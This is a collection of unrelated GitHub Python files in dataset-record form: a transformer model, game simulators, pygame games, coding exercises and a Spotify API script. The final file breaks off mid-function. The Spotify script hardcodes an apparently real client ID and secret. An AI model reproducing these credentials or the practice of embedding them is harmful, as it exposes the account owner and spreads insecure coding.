anchor node sampling. In case of biased sampling, determines centrality metric.\n num_anchor_nodes: int, the amount of anchor nodes to sample and subsequently generate distance embeddings for. 0 anchor nodes results in a baseline GraphSAGE model.\n distance_function: {None, 'distance', 'similarity', 'euclidean'}, determines the distance metric used for embedding space distance calculation for the node2vec implementation. None if embedding_space == 'geodesic'.\n num_workers: int, the amount of workers for multiprocessing of shortest path calculation.\n \n Returns the GraphPOPE feature embeddings concatenated with the original feature matrix.\n \"\"\"\n global cached_pope_embedding #for caching\n pope_map = {\n 'geodesic': attach_distance_embedding,\n 'node2vec': attach_node2vec,\n }\n\n # Avoid deriving pope embeddings twice due to test dataloader instantiating a new LightningDataModule after training conclusion\n try:\n enhanced_features = cached_pope_embedding\n \n except NameError:\n pope = pope_map[embedding_space]\n enhanced_features = pope(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers=num_workers)\n cached_pope_embedding = enhanced_features\n \n return enhanced_features","repo_name":"JeroendenBoef/GraphPOPE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"11680459113","text":"import copy\nimport math\n\nimport torch\nimport numpy as np\nfrom einops import rearrange\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self, layer, norm, N):\n super(Encoder, self).__init__()\n self.layers = clone(layer, N)\n self.norm = norm\n\n def forward(self, src, src_mask):\n for layer in self.layers:\n src = layer(src, src_mask)\n return self.norm(src)\n\n\nclass EncoderLayer(nn.Module):\n def __init__(self, attn, ff, su):\n super(EncoderLayer, self).__init__()\n self.attn = attn\n self.ff = ff\n self.su = clone(su, 2)\n\n def forward(self, src, src_mask):\n src = self.su[0](src, lambda x: self.attn(x, x, x, src_mask))\n return self.su[1](src, self.ff)\n\n\nclass Decoder(nn.Module):\n def __init__(self, layer, norm, N):\n super(Decoder, self).__init__()\n self.layers = clone(layer, N)\n self.norm = norm\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n for layer in self.layers:\n tgt = layer(src, tgt, src_mask, tgt_mask)\n return self.norm(tgt)\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, attn, attn2, ff, su):\n super(DecoderLayer, self).__init__()\n self.attn = attn\n self.attn2 = attn2\n self.ff = ff\n self.su = clone(su, 3)\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n tgt = self.su[0](tgt, lambda x: self.attn(x, x, x, tgt_mask))\n tgt = self.su[1](tgt, lambda x: self.attn(x, src, src, src_mask))\n return self.su[2](tgt, self.ff)\n\n\nclass Transformer(nn.Module):\n def __init__(self, src_embed, tgt_embed, encoder, decoder, generator):\n super(Transformer, self).__init__()\n self.src_embed = src_embed\n self.tgt_embed = tgt_embed\n self.encoder = encoder\n self.decoder = decoder\n self.generator = generator\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n src_rep = self.encode(src, src_mask)\n tgt_rep = self.decode(src_rep, tgt, src_mask, tgt_mask)\n return self.generator(tgt_rep)\n\n def decode(self, src_rep, tgt, src_mask, tgt_mask):\n return self.decoder(src_rep, self.tgt_embed(tgt), src_mask, tgt_mask)\n\n def encode(self, src, src_mask):\n return self.encoder(self.src_embed(src), src_mask)\n\n\ndef get_transformer(src_vocab_size, tgt_vocab_size, N, d_model, h, d_ff, dropout=0.1):\n c = copy.deepcopy\n\n src_embed = Embedding(d_model, src_vocab_size)\n tgt_embed = Embedding(d_model, tgt_vocab_size)\n\n pe = PositionalEncoding(d_model, dropout=dropout)\n\n src_embed = nn.Sequential(src_embed, c(pe))\n tgt_embed = nn.Sequential(tgt_embed, c(pe))\n\n attn = MultiheadAttention(d_model, h, dropout=dropout)\n ff = FeedForward(d_model, d_ff, dropout=dropout)\n norm = LayerNorm(d_model)\n su = SublayerConnection(c(norm))\n\n encoder = Encoder(EncoderLayer(c(attn), c(ff), c(su)), c(norm), N)\n decoder = Decoder(DecoderLayer(c(attn), c(attn), c(ff), c(su)), c(norm), N)\n\n generator = nn.Linear(d_model, tgt_vocab_size)\n\n model = Transformer(src_embed, tgt_embed, encoder, decoder, generator)\n\n for name, param in model.named_parameters():\n if param.dim() > 1:\n nn.init.xavier_uniform(param)\n\n return model\n\n\ndef clone(layer, n):\n return nn.ModuleList([copy.deepcopy(layer) for _ in range(n)])\n\n\nclass MultiheadAttention(nn.Module):\n def __init__(self, d_model, h, dropout=0.1):\n super(MultiheadAttention, self).__init__()\n assert d_model % h == 0\n\n self.h = h\n self.d_k = d_model // h\n self.w = clone(nn.Linear(d_model, d_model), 3)\n self.dropout = nn.Dropout(p=dropout)\n self.out = nn.Linear(d_model, d_model)\n\n def forward(self, q, k, v, mask):\n q, k, v = [rearrange(f(x), 'b s (h k) -> b h s k', h=self.h) for f, x in zip(self.w, [q, k, v])]\n score = q @ k.transpose(-1, -2) / math.sqrt(self.d_k)\n score = torch.masked_fill(score, mask, -1e9)\n attn = F.softmax(score, dim=-1)\n attn = self.dropout(attn)\n w_v = attn @ v\n c_v = rearrange(w_v, 'b h s k -> b s (h k)')\n return self.out(c_v)\n\n\nclass FeedForward(nn.Module):\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(FeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.gelu(self.w_1(x))))\n\n\nclass LayerNorm(nn.Module):\n def __init__(self, d_model, eps=1e-9):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(d_model))\n self.b_2 = nn.Parameter(torch.zeros(d_model))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(dim=-1, keepdim=True)\n std = x.std(dim=-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n def __init__(self, norm, dropout=0.1):\n super(SublayerConnection, self).__init__()\n self.norm = norm\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x, layer):\n return x + self.dropout(layer(self.norm(x)))\n\n\nclass Embedding(nn.Module):\n def __init__(self, d_model, vocab_size):\n super(Embedding, self).__init__()\n self.embed = nn.Embedding(vocab_size, d_model)\n self.d_model = d_model\n\n def forward(self, x):\n return self.embed(x) * math.sqrt(self.d_model)\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_len=50000, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000) / d_model))\n pe[:, ::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n self.register_buffer('pe', pe.unsqueeze(0))\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n return self.dropout(x + self.pe[:, :x.size(1)])\n\n\ndef get_sample_data():\n src = torch.arange(1, 101, 1).view(10, 10)\n tgt = torch.arange(2, 102, 1).view(10, 10)\n src_mask, tgt_mask = get_mask(src, tgt)\n return src, tgt, src_mask, tgt_mask\n\n\ndef get_mask(src, tgt, pad_idx=0):\n src_mask = get_pad_mask(src, pad_idx)\n tgt_mask = get_pad_mask(tgt, pad_idx) | get_seq_mask(src)\n return src_mask, tgt_mask\n\n\ndef get_seq_mask(src):\n return torch.from_numpy(np.triu(np.ones(src.size(1)))) == 1\n\n\ndef get_pad_mask(src, pad_idx):\n return (src == pad_idx).unsqueeze(1).unsqueeze(1)\n","repo_name":"hankyul2/ddackdae","sub_path":"practice/src/transformer2.py","file_name":"transformer2.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38695636924","text":"\r\nfrom dataclasses import dataclass\r\n\r\n@dataclass\r\nclass Cuenta:\r\n nombre: str\r\n dinero: float\r\n dinero_mes_pasado: float\r\n dinero_retirado: float\r\n dinero_ingresado: float\r\n numero_cuenta: int\r\n numero_transacciones: int\r\n \r\n\r\n\r\ncuenta1 = Cuenta(input(\"introduzca nombre propietario: \"), float(input(\"Introduzca cantidad de dinero en la cuenta: \")),float(input(\"Introduzca cantidad de dinero en la cuenta el mes pasado: \")),0,0,input(\"Introducir numero de cuenta: \"),0)\r\n\r\nn=1\r\nwhile n==1:\r\n\r\n\r\n v1 = input(\"Desea retirar dinero de la cuenta? (1 si 0 no): \")\r\n\r\n if v1 == \"1\":\r\n cuenta1.dinero_retirado = float(input(\"Cuanto dinero desea retirar: \"))\r\n cuenta1.numero_transacciones = cuenta1.numero_transacciones +1\r\n\r\n v2 = input(\"Desea ingresar dinero de la cuenta? (1 si 0 no): \")\r\n if v2 == \"1\" :\r\n cuenta1.dinero_ingresado = float(input(\"Cuanto dinero desea ingresar: \"))\r\n cuenta1.numero_transacciones = cuenta1.numero_transacciones +1\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n dia = input(\"Que dia del mes es?: \")\r\n if dia == \"1\":\r\n cuenta1.numero_transacciones =0\r\n cuenta1.dinero_mes_pasado = cuenta1.dinero\r\n\r\n cuenta1.dinero = cuenta1.dinero -cuenta1.dinero_retirado + cuenta1.dinero_ingresado\r\n cuenta1.dinero_ingresado=0\r\n cuenta1.dinero_retirado=0\r\n\r\n beneficios=float(input(\"Introduzca un valor y le diremos si sus beneficios respecto al mes anterior es mayor: \"))\r\n\r\n if beneficios>(cuenta1.dinero-cuenta1.dinero_mes_pasado):\r\n print(\"Sus beneficios no son lo suficientemente altos\")\r\n\r\n else:\r\n print(\"Sus beneficios son mayores a la cifra dada\")\r\n\r\n print(\"El saldo de esta cuenta es de \"+str(cuenta1.dinero)+\" y el numero de transacciones es de \"+str(cuenta1.numero_transacciones))\r\n\r\n\r\n\r\n n=float(input(\"Desea continuar haciendo operaciones? 1 si 0 no: \"))\r\n\r\n\r\n\r\n","repo_name":"Jorgediamanto/Ejercicios-de-Iteraci-n","sub_path":"Ejercicios de Iteración 6.py","file_name":"Ejercicios de Iteración 6.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71943208685","text":"import requests\nimport base64\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\n\n# Spotify tokens\nid = '17e466af805745bf8a92dda2b32555c3'\nsecret = '61bec1966e0c4719aba667b20ca39ade'\nredirect = 'http://127.0.0.1:5000/'\n\n# Getting my access token\nauth_header = base64.b64encode(f\"{id}:{secret}\".encode('utf-8')).decode('utf-8')\n\nauth = requests.post(\"https://accounts.spotify.com/api/token\", \n headers={\"Authorization\": f\"Basic {auth_header}\"},\n data={\"grant_type\": \"client_credentials\"})\ntoken = auth.json()['access_token']\n\n# OAuth code\nsp_oauth = SpotifyOAuth(client_id = id,\n client_secret = secret,\n redirect_uri = redirect,\n scope='user-read-recently-played')\n\n# made api\nsp = spotipy.Spotify(auth_manager=sp_oauth)\n\n# Get recent played tracks\ntry:\n results = sp.current_user_recently_played()\n for idx, item in enumerate(results['items']):\n track = item['track']\n print(f\"{idx}: {track['artists'][0]['name']} – {track['name']}\")\nexcept Exception as e:\n print(f\"An error occurred: {str(e)}\")\n\n# # retrieve artist info\n# headers = {\"Authorization\": f\"Bearer {token}\"}\n# artist_name = \"Taylor Swift\"\n# response = requests.get(f\"https://api.spotify.com/v1/search?q={artist_name}&type=artist\", headers=headers)\n# artist_info = response.json()\n\n# # print info abt artist\n# try:\n# artists = artist_info['artists']['items']\n# for artist in artists:\n# if artist['name'].lower() == artist_name.lower():\n# print(f\"Name: {artist['name']}\")\n# print(f\"Genres: {', '.join(artist['genres'])}\")\n# print(f\"Spotify URI: {artist['uri']}\")\n# except KeyError:\n# print(\"No artist information found.\")\n","repo_name":"ClaytonKwon/HONORproject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16170717575","text":"from __future__ import annotations\nfrom typing import Generator\n\nCOLOR_WHITE = 0\nCOLOR_RED = 1\nCOLOR_BLUE = 2\n\nDIR_RIGHT = 1\nDIR_LEFT = 2\nDIR_UP = 3\nDIR_DOWN = 4\n\nREVERSED_DIR = {\n DIR_RIGHT: DIR_LEFT,\n DIR_LEFT: DIR_RIGHT,\n DIR_UP: DIR_DOWN,\n DIR_DOWN: DIR_UP,\n}\n\n\ndef main():\n N, K = map(int, input().split())\n A = [list(map(int, input().split())) for _ in range(N)]\n simulator = Simulator(N, A)\n for _ in range(K):\n r, c, d = map(int, input().split())\n simulator.add_piece(r, c, d)\n\n answer = simulator.simulate(limit=1000)\n if answer:\n print(answer)\n else:\n print(-1)\n\n\nclass Simulator(object):\n def __init__(self, N: int, A: list[int]) -> None:\n self.N: int\n self.color: int\n self.pieces: list[Piece]\n self.root: list[list[Piece]]\n\n self.N = N\n self.color = A\n self.pieces = []\n self.root = [[None] * (N+1) for _ in range(N+1)]\n\n def add_piece(self, r: int, c: int, d: int) -> None:\n piece = Piece(r, c, d)\n self.pieces.append(piece)\n self.put_down(piece, r, c)\n\n def simulate(self, limit: int) -> int:\n for t in range(1, limit+1):\n for piece in self.pieces:\n self.do_turn(piece)\n if self.count_pieces(piece.row, piece.col) >= 4:\n return t\n return None\n\n def do_turn(self, piece: Piece) -> None:\n r, c = piece.row, piece.col\n nr, nc = self.get_next_pos(r, c, piece.dir)\n color = self.get_cell_color(nr, nc)\n if color == COLOR_WHITE:\n self.pick_up(piece)\n self.put_down(piece, nr, nc)\n elif color == COLOR_RED:\n self.pick_up(piece)\n piece = self.reverse(piece)\n self.put_down(piece, nr, nc)\n elif color == COLOR_BLUE:\n piece.dir = REVERSED_DIR[piece.dir]\n nr, nc = self.get_next_pos(r, c, piece.dir)\n if self.get_cell_color(nr, nc) != COLOR_BLUE:\n self.do_turn(piece)\n\n def get_next_pos(self, r: int, c: int, d: int) -> tuple[int, int]:\n nr = r + {DIR_UP: -1, DIR_DOWN: 1}.get(d, 0)\n nc = c + {DIR_LEFT: -1, DIR_RIGHT: 1}.get(d, 0)\n return nr, nc\n\n def get_cell_color(self, r: int, c: int) -> int:\n if 1 <= r <= self.N and 1 <= c <= self.N:\n return self.color[r-1][c-1]\n return COLOR_BLUE\n\n def pick_up(self, piece: Piece) -> None:\n r, c = piece.row, piece.col\n if self.root[r][c] is piece:\n self.root[r][c] = None\n else:\n lower = piece.lower\n piece.lower = None\n lower.upper = None\n\n def put_down(self, piece: Piece, r: int, c: int) -> None:\n for p in piece.iter_up():\n p.row = r\n p.col = c\n if self.root[r][c] is None:\n self.root[r][c] = piece\n else:\n lower = self.root[r][c].get_top()\n piece.lower = lower\n lower.upper = piece\n\n def reverse(self, bottom_piece: Piece) -> Piece:\n pieces = list(bottom_piece.iter_up())\n for piece in pieces:\n piece.upper, piece.lower = piece.lower, piece.upper\n return pieces[-1]\n\n def get_upper_sequence(self, piece: Piece) -> list[Piece]:\n pieces = []\n cur = piece\n while cur:\n pieces.append(cur)\n cur = cur.upper\n return pieces\n\n def count_pieces(self, r: int, c: int) -> int:\n root = self.root[r][c]\n return root.get_height() if root else 0\n\n\nclass Piece(object):\n def __init__(self, r: int, c: int, d: int) -> None:\n self.row: int\n self.col: int\n self.dir: int\n self.upper: Piece\n self.lower: Piece\n\n self.row = r\n self.col = c\n self.dir = d\n self.upper = None\n self.lower = None\n\n def __repr__(self) -> str:\n return f\"Piece({self.row}, {self.col}, {self.dir}, {self.get_height()})\"\n\n def get_height(self) -> int:\n if not self.upper:\n return 1\n return 1 + self.upper.get_height()\n\n def get_top(self) -> Piece:\n if not self.upper:\n return self\n return self.upper.get_top()\n\n def iter_up(self) -> Generator[Piece]:\n cur = self\n while cur:\n yield cur\n cur = cur.upper\n\n\nmain()\n","repo_name":"DoubleJONY/KDJ-algorithm-challenge","sub_path":"heoh/boj-17837.py","file_name":"boj-17837.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"70203564847","text":"import random\nimport time\nimport os\nimport sys\nsys.path.append('../pysos')\nimport pysos\nimport finder\nimport psutil\nimport gc\nimport pickle\nimport cProfile\nfrom finder import Hit\n\n\n\ndef RAM(obj):\n temp = obj._collection\n obj._collection = None\n size = len(pickle.dumps(obj)) / 1024 / 1024\n obj._collection = temp\n return size\n \nstart = time.time()\n\nFILE = 'omdb_10k.sos'\ndb = pysos.List(FILE)\n\nprint(\"%.2fs: %d items loaded\" % (time.time() - start, len(db)))\n\n#cProfile.run('finder = finder.Finder(db)')\n\nfinder = finder.Finder(db, FILE + '.idx')\n\nprint(\"%.2fs\" % (time.time() - start))\nprint(\"%.2fs: %d indexed words\" % (time.time() - start, len(finder._voc)) )\n#print(\"%.2fs: RAM: %.2f mb\" % (time.time() - start, RAM(finder)) )\nprint(\"%.2fs\" % (time.time() - start))\n\nf = finder\ndb.observe(f.update)\n\ndb[111] = {'foo': 'testtest'}\n\nres = f.search('testtest')\nprint(res)\n\nprint(\"---------------\")\n\nstart = time.time()\nres = f.search('alice') \ncProfile.run(\"res = f.search('alice')\")\nprint(len(res))\nprint(\"%.2fs normal search\" % (time.time() - start))\n\nstart = time.time()\nres = f.search_old('the')\nprint(\"%.2fs old search\" % (time.time() - start))\n\n\nstart = time.time()\n#res = f.find('ali', exact=False, weights={'Title':1})\n#cProfile.run(\"res = f.search('the')\")\nres = f.search('the')\n#print(next(res))\nprint(\"%.2fs normal search\" % (time.time() - start))\n\n\nstart = time.time()\nres = f.search_old('the')\nprint(\"%.2fs old search\" % (time.time() - start))","repo_name":"dagnelies/finder","sub_path":"test_omdb.py","file_name":"test_omdb.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30302850372","text":"#https://leetcode.com/problems/longest-increasing-path-in-a-matrix/description/\ndef main():\n\n\tA = [\n\t [9,9,4],\n\t [6,6,8],\n\t [2,1,1]\n\t]\n\n\tmatrix = {row_index + column_index*1j: value\n\t\t\t\tfor row_index, row in enumerate(A) for column_index, value in enumerate(row)}\n\n\tlength = dict.fromkeys(matrix.keys(), 1)\n\n\tfor z in sorted(matrix, key=matrix.get):\n\t\tlength[z] = 1 + max([\n\t\t\t\t\t\tlength[Z] for Z in (z+1, z-1, z+1j, z-1j)\n\t\t\t\t\t\tif Z in matrix and matrix[z] > matrix[Z]\n\t\t\t\t\t\t] or [0])\n\tprint(max(length.values() or [0]))\n\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Irunyards/Leetcode_hard","sub_path":"longest_increasing_path_in_a_matrix.py","file_name":"longest_increasing_path_in_a_matrix.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13622544958","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nfrom Config import *\r\nfrom Config_joueur import *\r\nfrom Carte import *\r\nfrom Perso import *\r\nfrom Bot import*\r\nfrom Bombe import*\r\nfrom random import*\r\nclass Jeu:\r\n \"\"\"Classe permettant de gérer le jeu\"\"\"\r\n\r\n def __init__(self, fenetre, nb_perso, nb_bots, nomCarte):\r\n self.fenetre = fenetre\r\n self.duree = 3 * 60\r\n\r\n # On affiche la carte\r\n self.carte = Carte(nomCarte)\r\n self.carte.charger()\r\n self.carte.tableau()\r\n self.tableau = self.carte.tableau\r\n self.carte.afficher(self.fenetre)\r\n\r\n\r\n\r\n # On créer les personnage\r\n\r\n # On créer les personnages\r\n\r\n for perso in range(nb_perso):\r\n Perso(self.carte)\r\n # On créer les bots\r\n for bot in range(nb_bots):\r\n Bot(self.carte)\r\n\r\n self.partieEnCours = True\r\n\r\n # Boucle du jeu\r\n while self.partieEnCours:\r\n self.carte.TableauAJour()\r\n #Limite des FPS\r\n pygame.time.Clock().tick(fenetre_FPS)\r\n\r\n # On verifie si la partie est finie\r\n if(self.verif_finPartie()):\r\n # On arrete la partie\r\n self.partieEnCours = False\r\n\r\n # On affiche un fond transparant sur la carte\r\n fond_transparant = pygame.Surface((self.carte.taille[0] * taille_sprite, self.carte.taille[1] * taille_sprite), pygame.SRCALPHA)\r\n fond_transparant.fill((255,255,255,64))\r\n self.fenetre.blit(fond_transparant, (origine_gameX, origine_gameY))\r\n pygame.display.flip()\r\n\r\n # On attend 3 secondes\r\n pygame.time.delay(3000)\r\n break\r\n\r\n # On remplie l'écran en noir\r\n self.fenetre.fill((0, 0, 0))\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == QUIT:\r\n self.partieEnCours = False\r\n elif event.type == KEYDOWN:\r\n # On vérifie pour tout les personnages vivant si la touche bombe est pressée\r\n for perso in self.carte.liste_perso:\r\n if(perso.vivant):\r\n if event.key == KEY_perso[perso.id_local]['bombe']:\r\n # Le personnage pose une bombe\r\n perso.poserBombe()\r\n\r\n # On vérifie pour tout les personnages vivant\r\n\r\n\r\n for perso in self.carte.liste_perso:\r\n if(perso.vivant):\r\n # Si une touche de déplacement est préssée, alors le personnage se déplace\r\n touchePressee = pygame.key.get_pressed()\r\n if(touchePressee[KEY_perso[perso.id_local]['haut']]):\r\n perso.deplacer('HAUT')\r\n elif(touchePressee[KEY_perso[perso.id_local]['bas']]):\r\n perso.deplacer('BAS')\r\n elif(touchePressee[KEY_perso[perso.id_local]['gauche']]):\r\n perso.deplacer('GAUCHE')\r\n elif(touchePressee[KEY_perso[perso.id_local]['droite']]):\r\n perso.deplacer('DROITE')\r\n\r\n for bot in self.carte.liste_bot:\r\n if (bot.vivant):\r\n bot.deplacer(self.carte, self.tableau)\r\n r = randint(1,15)\r\n if r >= 12 :\r\n bot.poserBombe()\r\n\r\n # On met a jour les chronomètres\r\n self.carte.liste_bombe.update()\r\n self.carte.liste_explosion.update()\r\n self.duree -= (-0.0333)\r\n\r\n # On met à jour la carte\r\n self.carte.afficher(self.fenetre)\r\n\r\n # On affiche le chronomètre de la partie\r\n self.afficherTemps()\r\n\r\n #Rafraichissement\r\n pygame.display.flip()\r\n\r\n def verif_finPartie(self):\r\n \"Vérifie si une partie est finie\"\r\n # S'il ne reste qu'un adversaire, il a gagné\r\n if(len(self.carte.liste_perso)) + (len(self.carte.liste_bot)) == 1:\r\n self.finPartie_victoire()\r\n return True\r\n # Si tout le monde est mort, ça fait égalité\r\n elif(len(self.carte.liste_perso))+ (len(self.carte.liste_bot)) == 0:\r\n self.finPartie_egualite()\r\n return True\r\n\r\n # Si le chronomètre de la partie est terminé, ça fait égalité\r\n if(self.duree <= 0):\r\n self.finPartie_egualite()\r\n return True\r\n\r\n def finPartie_victoire(self):\r\n \"Affiche le texte de victoire au milieu de l'écran\"\r\n font = pygame.font.Font(None, 96)\r\n\r\n if(len(self.carte.liste_perso) != 0):\r\n for perso in self.carte.liste_perso:\r\n vainqueur = \"Joueur {0}\".format(perso.id_local)\r\n else:\r\n vainqueur = \"Bot\"\r\n\r\n texte = \"Victoire du {0}\".format(vainqueur)\r\n text = font.render(texte, 1, (250, 250, 250))\r\n self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((taille_fenetre[1]/2)-(font.size(texte)[1]/2))))\r\n\r\n def finPartie_egualite(self):\r\n \"Affiche le texte d'égalité au milieu de l'écran\"\r\n font = pygame.font.Font(None, 96)\r\n texte = \"Égalité\"\r\n text = font.render(texte, 1, (250, 250, 250))\r\n self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((taille_fenetre[1]/2)-(font.size(texte)[1]/2))))\r\n\r\n def afficherTemps(self):\r\n \"Affiche le chronomètre de la partie\"\r\n font = pygame.font.Font(None, 32)\r\n texte = \"{:02.0f}:{:02.0f}\".format(self.duree//60, self.duree%60)\r\n text = font.render(texte, 1, (250, 250, 250))\r\n self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((origine_gameY/2)-(font.size(texte)[1]/2))))\r\n","repo_name":"nithramus/42","sub_path":"pour git/Version finale avec bot/Jeu.py","file_name":"Jeu.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"70058934126","text":"from pygame import image\nfrom global_variables import *\nimport pygame\nfrom User_character import Character\nfrom Obstacles import Helicopter, Building, Present\nimport time\nimport random\n\n#T_ODO: Change player jump\n#T_ODO: Add score and lifes text\n#T_ODO: Add hitboxes to obstacles\n#TODO: Make presents' code\n#TODO: Add background music\n#TODO: Add hop sound effect on movement\n#TODO: Make respawn animation\n#TODO: Make helicopter animation\n#TODO: Add lost screen to quit game or redirect to main menu\n#TODO: Main menu:\n# - Game name\n# - Background animation\n# - Change character (selector)\n# - Set name\n\n\ndef isQuit():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n\ndef isDeadFromCollision():\n sentinel = False\n if len(obstacles_in_scene[0]) > 0:\n for helicopter in obstacles_in_scene[0]:\n # print(\"Helicopter: \", helicopter.rect.x, helicopter.rect.y, \" | User: \", user.rect.x, user.rect.y)\n if user.rect.colliderect(helicopter.rect):\n sentinel = True\n \n if len(obstacles_in_scene[2]) > 0:\n for building in obstacles_in_scene[2]:\n #print(\"Building: \", building.rect.x, building.rect.y, \" | User: \", user.rect.x, user.rect.y)\n if user.rect.colliderect(building.rect):\n sentinel = True\n \n if user.hasColided == True and sentinel == True:\n pass\n elif user.hasColided == True and sentinel == False:\n user.hasColided = False\n return sentinel\n elif user.hasColided == False and sentinel == True:\n user.hasColided = True\n return sentinel\n\n\ndef hasObtainedPoints():\n if len(obstacles_in_scene[1]) > 0:\n for present in obstacles_in_scene[1]:\n if user.rect.colliderect(present.rect):\n user.score += 1\n present.showImage = False\n \n return True\n\n\ndef isDeadFromFloorBang():\n if user.y >= screen_height-user.height:\n return True\n \n return False\n\n\ndef islifeLost():\n global lifeLost_value\n isDeadFromFloorBang_value = isDeadFromFloorBang()\n isDeadFromCollision_value = isDeadFromCollision()\n \n if isDeadFromFloorBang_value:\n if user.lifes > 0:\n user.respawnAnimation\n user.lifes -= 1\n lifeLost_value = True\n #TO REMOVE AFTER ANIMATION COMPLETED\n time.sleep(1)\n user.x, user.y = user.initial_x, user.initial_y\n user.rect.x, user.rect.y = user.initial_x, user.initial_y\n #######\n print(\"isDeadFromFloorBang\")\n\n elif isDeadFromCollision_value:\n user.lifes -= 1\n lifeLost_value = True\n user.blinkAnimation\n print(\"isDeadFromCollision\")\n\n return isDeadFromFloorBang_value and isDeadFromCollision_value\n\n\ndef create_obstacles():\n helicopter_height = str(random.randint(0,3))\n building_height = str(random.randint(0,3))\n showPresent = True if random.randint(0,10) == 3 else False\n\n if helicopter_height == \"3\" and building_height == \"3\":\n if random.randint(0,1) == 0:\n helicopter_height = \"1\"\n else:\n building_height = \"1\"\n\n elif helicopter_height == \"3\" and building_height == \"2\":\n building_height = \"1\"\n\n elif helicopter_height == \"2\" and building_height == \"3\":\n helicopter_height = \"1\"\n\n present_y_position = (heightConverter[helicopter_height] + (screen_height - heightConverter[building_height])) / 2 - 100\n\n #sentinel_helicopter=obstacles_in_scene[0]\n #sentinel_present=obstacles_in_scene[1] if showPresent\n #sentinel_building=obstacles_in_scene[2]\n\n #sentinel_helicopter = str(sentinel_helicopter)\n #sentinel_present = str(sentinel_present)\n #sentinel_building = str(sentinel_building)\n\n obstacles_in_scene[0].append(Helicopter(helicopter_height, pygame.Rect(screen_width, 0, 100, heightConverter[helicopter_height])))\n obstacles_in_scene[2].append(Building(building_height, pygame.Rect(screen_width, screen_height - heightConverter[building_height], 100, heightConverter[building_height])))\n #if showPresent:\n obstacles_in_scene[1].append(Present(present_y_position, pygame.Rect(screen_width, present_y_position, 100, 100)))\n\n\ndef move():\n global sentinelSpeed\n\n dummie = pygame.key.get_pressed()\n if dummie[pygame.K_UP] and user.jumping_animation_duration_timer == 0:\n user.y -= user.jump_speed\n user.rect.y -= user.jump_speed\n if user.y < 10:\n user.y = 10\n user.rect.y = 10\n user.jumping_animation_duration_timer = user.jumping_animation_duration\n #sentinelSpeed = user.speed\n \n elif user.jumping_animation_duration_timer > 0:\n \n if user.jumping_animation_duration_timer >= user.jumping_animation_duration_halved:\n user.y -= user.speed / fps / 4*3\n user.rect.y -= user.speed / fps / 4*3\n if user.y < 10:\n user.y = 10\n user.rect.y = 10\n else:\n #Code to make a slow fall animation\n user.y += user.speed / fps / 4\n user.rect.y = user.speed / fps / 4\n pass\n \n user.jumping_animation_duration_timer -= 1\n \n else:\n user.y += gravity\n user.rect.y += gravity\n\n user.rect.y = user.y\n #print(user.rect.y, user.y)\n\n\ndef move_scene():\n #Move obstacles\n if len(obstacles_in_scene[0]) > 0:\n for helicopter in obstacles_in_scene[0]:\n helicopter.rect.x -= obstacle_speed\n helicopter.x -= obstacle_speed\n \n if len(obstacles_in_scene[1]) > 0:\n for present in obstacles_in_scene[1]:\n present.rect.x -= obstacle_speed\n present.x -= obstacle_speed\n \n if len(obstacles_in_scene[2]) > 0:\n for building in obstacles_in_scene[2]:\n building.rect.x -= obstacle_speed\n building.x -= obstacle_speed\n\n\ndef load_window():\n global lifeLost_value\n screen.blit(background_image, (0,0))\n screen.blit(user_character, (user.x, user.y))\n screen.blit(lifes_font, (screen_width - 200, 20))\n screen.blit(score_font, (screen_width - 200, 90))\n if lifeLost_value:\n 